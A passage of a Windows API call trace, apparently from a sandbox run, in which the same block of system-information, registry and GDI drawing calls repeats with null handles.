lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.397] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.397] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.397] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.397] BeginPath (hdc=0x0) returned 0 [0088.397] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.397] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.397] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.397] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.397] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.397] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.397] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.397] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.397] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9c0401d3 [0088.397] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9a0401d6 [0088.397] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ad9 [0088.397] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ada [0088.397] CombineRgn (hrgnDst=0x1041ad9, hrgnSrc1=0x9c0401d3, hrgnSrc2=0x9a0401d6, iMode=1) returned 1 [0088.397] CombineRgn (hrgnDst=0x1041ada, hrgnSrc1=0x9c0401d3, hrgnSrc2=0x9a0401d6, iMode=4) returned 2 [0088.397] CreateSolidBrush (color=0xff) returned 0x2101ad8 [0088.397] CreateSolidBrush (color=0xff0000) returned 0x1101adb [0088.397] DeleteObject (ho=0x1101adb) returned 1 [0088.397] DeleteObject (ho=0x9a0401d6) returned 1 [0088.397] DeleteObject (ho=0x9c0401d3) returned 1 [0088.398] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.398] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.398] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.398] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.398] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.398] BeginPath (hdc=0x0) returned 0 [0088.398] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.398] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.398] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.398] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.398] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.398] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.398] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.398] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.398] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9b0401d6 [0088.398] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9d0401d3 [0088.398] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041adc [0088.398] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041add [0088.398] CombineRgn (hrgnDst=0x1041adc, hrgnSrc1=0x9b0401d6, hrgnSrc2=0x9d0401d3, iMode=1) returned 1 [0088.398] CombineRgn (hrgnDst=0x1041add, hrgnSrc1=0x9b0401d6, hrgnSrc2=0x9d0401d3, iMode=4) returned 2 [0088.398] CreateSolidBrush (color=0xff) returned 0x2101adb [0088.398] CreateSolidBrush (color=0xff0000) returned 0x1101ade [0088.398] DeleteObject (ho=0x1101ade) returned 1 [0088.398] DeleteObject (ho=0x9d0401d3) returned 1 [0088.398] DeleteObject (ho=0x9b0401d6) returned 1 [0088.398] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.398] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.398] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.398] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.399] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.399] BeginPath (hdc=0x0) returned 0 [0088.399] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.399] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.399] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.399] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.399] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.399] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.399] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.399] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.399] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9e0401d3 [0088.399] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9c0401d6 [0088.399] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041adf [0088.399] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ae0 [0088.399] CombineRgn (hrgnDst=0x1041adf, hrgnSrc1=0x9e0401d3, hrgnSrc2=0x9c0401d6, iMode=1) returned 1 [0088.399] CombineRgn (hrgnDst=0x1041ae0, hrgnSrc1=0x9e0401d3, hrgnSrc2=0x9c0401d6, iMode=4) returned 2 [0088.399] CreateSolidBrush (color=0xff) returned 0x2101ade [0088.399] CreateSolidBrush (color=0xff0000) returned 0x1101ae1 [0088.399] DeleteObject (ho=0x1101ae1) returned 1 [0088.399] DeleteObject (ho=0x9c0401d6) returned 1 [0088.399] DeleteObject (ho=0x9e0401d3) returned 1 [0088.399] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.399] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.399] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.400] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.400] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.400] BeginPath (hdc=0x0) returned 0 [0088.400] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.400] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.400] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.400] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.400] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.400] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.400] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.400] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.400] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9d0401d6 [0088.400] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9f0401d3 [0088.400] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ae2 [0088.400] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ae3 [0088.400] CombineRgn (hrgnDst=0x1041ae2, hrgnSrc1=0x9d0401d6, hrgnSrc2=0x9f0401d3, iMode=1) returned 1 [0088.400] CombineRgn (hrgnDst=0x1041ae3, hrgnSrc1=0x9d0401d6, hrgnSrc2=0x9f0401d3, iMode=4) returned 2 [0088.400] CreateSolidBrush (color=0xff) returned 0x2101ae1 [0088.400] CreateSolidBrush (color=0xff0000) returned 0x1101ae4 [0088.400] DeleteObject (ho=0x1101ae4) returned 1 [0088.400] DeleteObject (ho=0x9f0401d3) returned 1 [0088.400] DeleteObject (ho=0x9d0401d6) returned 1 [0088.400] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.400] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.400] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.400] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.400] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.400] BeginPath (hdc=0x0) returned 0 [0088.400] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.400] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.401] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.401] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.401] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.401] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.401] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.401] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.401] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa00401d3 [0088.401] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9e0401d6 [0088.401] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ae5 [0088.401] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ae6 [0088.401] CombineRgn (hrgnDst=0x1041ae5, hrgnSrc1=0xa00401d3, hrgnSrc2=0x9e0401d6, iMode=1) returned 1 [0088.401] CombineRgn (hrgnDst=0x1041ae6, hrgnSrc1=0xa00401d3, hrgnSrc2=0x9e0401d6, iMode=4) returned 2 [0088.401] CreateSolidBrush (color=0xff) returned 0x2101ae4 [0088.401] CreateSolidBrush (color=0xff0000) returned 0x1101ae7 [0088.401] DeleteObject (ho=0x1101ae7) returned 1 [0088.401] DeleteObject (ho=0x9e0401d6) returned 1 [0088.401] DeleteObject (ho=0xa00401d3) returned 1 [0088.401] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.401] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.401] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.401] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.401] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.401] BeginPath (hdc=0x0) returned 0 [0088.401] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.401] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.401] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.401] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.401] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.401] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.401] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.401] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.402] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9f0401d6 [0088.402] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa10401d3 [0088.402] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ae8 [0088.402] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041ae9 [0088.402] CombineRgn (hrgnDst=0x1041ae8, hrgnSrc1=0x9f0401d6, hrgnSrc2=0xa10401d3, iMode=1) returned 1 [0088.402] CombineRgn (hrgnDst=0x1041ae9, hrgnSrc1=0x9f0401d6, hrgnSrc2=0xa10401d3, iMode=4) returned 2 [0088.402] CreateSolidBrush (color=0xff) returned 0x2101ae7 [0088.402] CreateSolidBrush (color=0xff0000) returned 0x1101aea [0088.402] DeleteObject (ho=0x1101aea) returned 1 [0088.402] DeleteObject (ho=0xa10401d3) returned 1 [0088.402] DeleteObject (ho=0x9f0401d6) returned 1 [0088.402] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.402] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.402] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.402] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.402] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.402] BeginPath (hdc=0x0) returned 0 [0088.402] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.402] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.402] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.402] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.402] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.402] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.402] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.402] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.402] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa20401d3 [0088.402] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa00401d6 [0088.403] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041aeb [0088.403] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041aec [0088.403] CombineRgn (hrgnDst=0x1041aeb, hrgnSrc1=0xa20401d3, hrgnSrc2=0xa00401d6, iMode=1) returned 1 [0088.403] CombineRgn (hrgnDst=0x1041aec, hrgnSrc1=0xa20401d3, hrgnSrc2=0xa00401d6, iMode=4) returned 2 [0088.403] CreateSolidBrush (color=0xff) returned 0x2101aea [0088.403] CreateSolidBrush (color=0xff0000) returned 0x1101aed [0088.403] DeleteObject (ho=0x1101aed) returned 1 [0088.403] DeleteObject (ho=0xa00401d6) returned 1 [0088.403] DeleteObject (ho=0xa20401d3) returned 1 [0088.403] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.403] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.403] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.403] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.403] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.403] BeginPath (hdc=0x0) returned 0 [0088.403] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.403] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.403] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.403] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.403] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.403] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.403] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.403] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.403] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa10401d6 [0088.403] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa30401d3 [0088.403] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041aee [0088.403] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041aef [0088.403] CombineRgn (hrgnDst=0x1041aee, hrgnSrc1=0xa10401d6, hrgnSrc2=0xa30401d3, iMode=1) returned 1 [0088.403] CombineRgn (hrgnDst=0x1041aef, hrgnSrc1=0xa10401d6, hrgnSrc2=0xa30401d3, iMode=4) returned 2 [0088.403] CreateSolidBrush (color=0xff) returned 0x2101aed [0088.403] CreateSolidBrush (color=0xff0000) returned 0x1101af0 [0088.404] DeleteObject (ho=0x1101af0) returned 1 [0088.404] DeleteObject (ho=0xa30401d3) returned 1 [0088.404] DeleteObject (ho=0xa10401d6) returned 1 [0088.404] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.404] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.404] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.404] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.404] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.404] BeginPath (hdc=0x0) returned 0 [0088.404] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.404] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.404] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.404] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.404] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.404] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.404] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.404] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.404] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa40401d3 [0088.404] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa20401d6 [0088.404] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041af1 [0088.404] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041af2 [0088.404] CombineRgn (hrgnDst=0x1041af1, hrgnSrc1=0xa40401d3, hrgnSrc2=0xa20401d6, iMode=1) returned 1 [0088.404] CombineRgn (hrgnDst=0x1041af2, hrgnSrc1=0xa40401d3, hrgnSrc2=0xa20401d6, iMode=4) returned 2 [0088.404] CreateSolidBrush (color=0xff) returned 0x2101af0 [0088.404] CreateSolidBrush (color=0xff0000) returned 0x1101af3 [0088.404] DeleteObject (ho=0x1101af3) returned 1 [0088.404] DeleteObject (ho=0xa20401d6) returned 1 [0088.404] DeleteObject (ho=0xa40401d3) returned 1 [0088.404] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.404] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.405] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.405] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.405] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.405] BeginPath (hdc=0x0) returned 0 [0088.405] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.405] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.405] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.405] GetClientRect (in: hWnd=0x0, 